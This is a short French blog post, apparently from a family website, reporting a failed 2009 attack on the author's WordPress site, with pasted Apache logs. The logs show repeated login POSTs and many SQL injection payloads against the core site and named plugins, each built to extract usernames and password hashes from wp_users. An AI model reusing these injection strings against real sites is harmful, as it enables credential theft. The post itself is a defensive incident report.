Duretz sur le Net ! » attack http://www.duretz.net Le portail de la famille Duretz Wed, 07 Dec 2011 14:54:56 +0000 en hourly 1 Une attaque avec libwhisker http://www.duretz.net/2009/01/14/a-libwhisker-attack/ http://www.duretz.net/2009/01/14/a-libwhisker-attack/#comments Wed, 14 Jan 2009 10:10:49 +0000 Laurent Duretz http://www.duretz.net/?p=140 Ce site a subi une attaque depuis un serveur letton.  Rien de sérieux mais c’est la seconde fois ce mois-ci.

Vous pouvez jeter un œil aux logs apache ci dessous.

?View Code APACHE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

94.247.3.38 - - [13/Jan/2009:14:09:56 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:57 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:11 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:13 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:15 +0100] "GET /index.php?feed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:17 +0100] "GET /index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:24 +0100] "GET /index.php?exact=1&sentence=1&s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:26 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:27 +0100] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1" 404 16231 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:28 +0100] "GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4+from+wp_users--&display=plain HTTP/1.1" 404 16247 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:29 +0100] "GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1" 404 16259 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:30 +0100] "GET /index.php?page_id=13&album=lala&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201 HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:31 +0100] "GET /forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16185 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:32 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16173 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:33 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x3a,user_login,0x3a,user_pass,0x3a),0,0,0,0,0/**/FROM/**/wp_users/* HTTP/1.1" 404 16197 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:34 +0100] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users HTTP/1.1" 404 16263 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:35 +0100] "GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x3a,user_login,0x3a,user_pass,0x3a),concat(0x3a,user_login,0x3a,user_pass,0x3a),4,5/**/FROM/**/wp_users HTTP/1.1" 404 16285 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:36 +0100] "GET /wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null,null,null,null%20%20from%20wp_users HTTP/1.1" 404 16357 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:40 +0100] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x3a,user_login,0x3a,user_pass,0x3a)%20from%20wp_users HTTP/1.1" 404 16211 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:41 +0100] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6,7%20from%20wp_users-- HTTP/1.1" 404 16241 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:42 +0100] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6%20from%20wp_users-- HTTP/1.1" 404 16251 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:43 +0100] "GET /index.php?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null+from+wp_tbv_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:44 +0100] "GET / HTTP/1.1" 200 16299 "-" "Mozilla (libwhisker/2.4)"

Ces requêtes ont été faites avec libwhisker. Elles ont été effectuées sur la page de login sans succès ou sur des plugins WordPress que je n’ai pas installé. Elles ont aussi tenté de faire des injections SQL dans la base de données sans plus de succès.

]]> http://www.duretz.net/2009/01/14/a-libwhisker-attack/feed/ 2